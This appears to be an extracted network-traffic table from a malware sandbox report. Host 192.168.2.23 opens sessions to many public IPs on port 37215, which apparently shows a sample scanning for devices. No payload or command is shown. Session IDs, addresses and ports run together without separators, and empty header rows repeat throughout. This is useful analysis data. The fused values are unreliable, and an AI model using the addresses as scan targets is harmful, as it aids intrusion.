                                          11111192.168.2.2358602125.243.230.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11112192.168.2.2360122197.8.65.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11113192.168.2.233433840.8.145.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11114192.168.2.233389041.217.143.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11115192.168.2.234652041.132.118.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11116192.168.2.2342054157.248.192.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11117192.168.2.2347100157.118.142.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11118192.168.2.2356706157.2.47.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11119192.168.2.2357238110.215.170.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11120192.168.2.2341702157.125.255.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11121192.168.2.2351304157.124.144.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11122192.168.2.2342828100.194.141.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11123192.168.2.2340950113.66.114.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11124192.168.2.2339810197.136.192.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11125192.168.2.2358294157.4.131.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11126192.168.2.2337892197.195.249.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11127192.168.2.234978841.64.232.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11128192.168.2.235283241.94.216.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11129192.168.2.2345018157.163.126.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11130192.168.2.2345154157.9.169.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11131192.168.2.2340754197.95.5.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11132192.168.2.2353282157.34.110.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11133192.168.2.2354796197.183.86.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11134192.168.2.2347572197.102.215.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11135192.168.2.2345530160.180.235.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11136192.168.2.233437841.33.241.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11137192.168.2.2349214157.12.152.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11138192.168.2.2340842197.244.255.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11139192.168.2.234032241.78.12.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11140192.168.2.234911441.62.197.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11141192.168.2.2359756149.221.38.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11142192.168.2.233502654.251.167.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11143192.168.2.2346360197.140.48.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11144192.168.2.234971273.101.82.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11145192.168.2.2341840197.156.232.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11146192.168.2.235146841.92.163.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11147192.168.2.2339542197.165.87.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11148192.168.2.233558441.6.45.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11149192.168.2.234953841.190.237.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11150192.168.2.2346522165.115.227.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11151192.168.2.233804241.118.85.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11152192.168.2.2342584157.178.23.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11153192.168.2.233981241.129.0.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11154192.168.2.2355828197.138.213.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11155192.168.2.2354594157.215.1.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11156192.168.2.2344362125.143.36.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11157192.168.2.235149641.199.87.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11158192.168.2.234227841.133.118.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11159192.168.2.2359910157.201.225.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11160192.168.2.2338664157.87.188.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11161192.168.2.2359780141.146.152.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11162192.168.2.2334788157.235.66.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11163192.168.2.2357130157.39.45.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11164192.168.2.2354884181.236.184.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11165192.168.2.233473641.90.109.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11166192.168.2.2340626157.47.39.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11167192.168.2.2357440197.8.196.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11168192.168.2.2351924197.82.6.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11169192.168.2.234260051.4.236.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11170192.168.2.234559441.218.0.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11171192.168.2.2344460188.191.1.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11172192.168.2.2348742157.235.119.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11173192.168.2.2334534157.169.87.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11174192.168.2.235065641.210.155.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11175192.168.2.234111641.7.225.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11176192.168.2.233659041.229.135.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11177192.168.2.2342570197.187.185.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11178192.168.2.235742041.15.130.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11179192.168.2.2339402157.86.147.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11180192.168.2.235334227.83.63.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11181192.168.2.2337780197.163.107.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11182192.168.2.2342180157.2.127.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11183192.168.2.2351868197.71.180.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11184192.168.2.2355064197.137.212.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11185192.168.2.234324841.210.74.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11186192.168.2.2360184157.235.249.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11187192.168.2.235365898.169.164.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11188192.168.2.2351234197.38.126.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11189192.168.2.23509682.66.46.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11190192.168.2.235598641.158.128.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11191192.168.2.233345299.248.105.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11192192.168.2.235694441.87.188.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11193192.168.2.2336364197.61.90.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11194192.168.2.2358544111.58.143.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11195192.168.2.2357446197.93.30.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11196192.168.2.2359434117.49.185.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11197192.168.2.235384441.103.35.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11198192.168.2.2349654157.194.98.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11199192.168.2.234743639.20.99.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11200192.168.2.2344384210.157.244.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11201192.168.2.235284441.37.193.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11202192.168.2.2346166157.16.101.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11203192.168.2.235460041.62.66.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11204192.168.2.234944241.222.53.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11205192.168.2.2360490193.251.176.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11206192.168.2.2348998197.224.105.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11207192.168.2.2354570157.203.64.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11208192.168.2.234311260.84.40.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11209192.168.2.233736041.150.111.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11210192.168.2.2360636170.37.157.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11211192.168.2.2337620197.106.111.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11212192.168.2.2336786157.106.17.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11213192.168.2.236006041.225.75.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11214192.168.2.2340266108.139.88.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11215192.168.2.2358588157.9.104.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11216192.168.2.234788437.21.233.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11217192.168.2.2355854216.76.122.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11218192.168.2.236027441.18.137.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11219192.168.2.235602241.18.7.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11220192.168.2.235615241.190.128.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11221192.168.2.2356916197.105.226.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11222192.168.2.2348534210.138.71.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11223192.168.2.2358212197.210.116.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11224192.168.2.2332856151.44.119.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11225192.168.2.2337382197.85.247.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11226192.168.2.233766641.38.9.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11227192.168.2.2339026157.213.167.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11228192.168.2.235758843.9.250.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11229192.168.2.233983418.176.122.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11230192.168.2.233684841.134.16.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11231192.168.2.235482636.86.199.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11232192.168.2.233492241.27.163.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11233192.168.2.2354134219.55.202.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11234192.168.2.234826241.5.111.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11235192.168.2.2336528197.64.160.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11236192.168.2.234116441.234.8.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11237192.168.2.2341508157.145.187.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11238192.168.2.2355174197.235.35.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11239192.168.2.235519841.33.113.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11240192.168.2.2336256197.52.45.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11241192.168.2.233741897.59.14.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11242192.168.2.234014841.106.250.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11243192.168.2.233317441.208.235.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11244192.168.2.2353880153.188.124.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11245192.168.2.233842044.110.62.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11246192.168.2.2341420109.137.188.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11247192.168.2.2359574157.52.134.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11248192.168.2.234939041.34.108.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11249192.168.2.2355510157.180.244.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11250192.168.2.2338028157.226.46.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11251192.168.2.234234841.110.91.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11252192.168.2.2354704197.213.234.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11253192.168.2.2336838157.238.201.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11254192.168.2.2333260157.33.76.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11255192.168.2.2342856197.156.243.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11256192.168.2.2345686197.83.139.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11257192.168.2.2359132207.147.153.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11258192.168.2.2350668157.194.157.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11259192.168.2.2360016153.3.223.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11260192.168.2.234287241.98.165.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11261192.168.2.234891297.120.210.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11262192.168.2.2354506197.157.249.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11263192.168.2.2353198155.62.141.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11264192.168.2.2351768197.141.148.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11265192.168.2.2351246206.132.230.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11266192.168.2.235713441.3.248.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11267192.168.2.2351910220.23.113.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11268192.168.2.2340070157.57.181.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11269192.168.2.2338844157.158.208.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11270192.168.2.2353726184.105.31.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11271192.168.2.234773641.10.191.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11272192.168.2.2343874197.144.213.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11273192.168.2.234152441.86.133.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11274192.168.2.234608441.78.143.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11275192.168.2.2348110197.56.148.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11276192.168.2.2359142206.70.9.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11277192.168.2.2342846142.52.31.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11278192.168.2.235819841.210.141.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11279192.168.2.2339060175.53.176.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11280192.168.2.235579041.139.245.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11281192.168.2.2360606157.113.99.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11282192.168.2.2341476197.39.240.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11283192.168.2.234900441.39.52.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11284192.168.2.235061641.28.114.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11285192.168.2.2348438197.230.90.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11286192.168.2.233849441.240.161.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11287192.168.2.2336860157.48.220.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11288192.168.2.2344080157.7.228.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11289192.168.2.2359364157.110.200.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11290192.168.2.2353758157.19.194.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11291192.168.2.2344452197.239.155.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11292192.168.2.2355000157.81.227.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11293192.168.2.2344966197.66.96.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11294192.168.2.2341044197.38.161.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11295192.168.2.234157441.169.30.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11296192.168.2.2347094157.134.202.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11297192.168.2.2358310197.75.92.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11298192.168.2.235791641.103.216.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11299192.168.2.2352008182.180.223.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11300192.168.2.2345318154.159.47.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11301192.168.2.2360692197.158.103.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11302192.168.2.2354390201.97.72.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11303192.168.2.2342602157.131.242.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11304192.168.2.234310241.187.200.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11305192.168.2.2343946148.233.175.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11306192.168.2.2353650197.206.34.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11307192.168.2.234357220.156.175.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11308192.168.2.233895441.155.30.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11309192.168.2.2358180209.151.91.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11310192.168.2.2344628157.220.247.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11311192.168.2.2350506197.63.184.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11312192.168.2.235657641.51.37.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11313192.168.2.235407641.245.13.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11314192.168.2.2359442146.128.18.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11315192.168.2.235024240.190.245.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11316192.168.2.235627041.55.138.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11317192.168.2.2359034157.9.137.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11318192.168.2.2336236202.122.202.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11319192.168.2.233795841.51.69.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11320192.168.2.235895241.154.40.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11321192.168.2.2353854216.139.180.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11322192.168.2.2350362197.83.6.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11323192.168.2.2342130157.29.15.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11324192.168.2.235179641.165.172.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11325192.168.2.2333424197.5.231.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11326192.168.2.2344124157.234.68.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11327192.168.2.2353290125.0.62.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11328192.168.2.235151860.48.222.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11329192.168.2.2343570157.35.254.22837215
                                          TimestampBytes transferredDirectionData


